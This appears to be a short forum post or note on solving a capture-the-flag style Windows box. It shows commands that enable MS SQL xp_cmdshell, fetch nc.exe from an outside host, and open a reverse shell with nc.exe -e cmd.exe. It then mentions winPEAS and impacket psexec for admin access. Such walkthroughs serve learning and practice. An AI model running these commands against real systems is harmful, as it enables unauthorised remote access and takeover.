So this box uses `xp_cmdshell` to get a reverse shell. How was I supposed to know to take this route?

enable `xp_cmdshell`
```
  EXEC sp_configure 'show advanced options', 1;
  EXEC sp_configure 'xp_cmdshell', 1;
  RECONFIGURE;
```

then exploit via
```
  xp_cmdshell "powershell.exe wget http://192.168.1.2/nc.exe -OutFile c:\\Users\Public\\nc.exe"
  xp_cmdshell  "c:\\Users\Public\\nc.exe -e cmd.exe 192.168.1.2 4444"
```

we use winpeas to discover that there is a file in the `/powershell/` dir with the admin pass on it

use impacket psexec to log in as admin




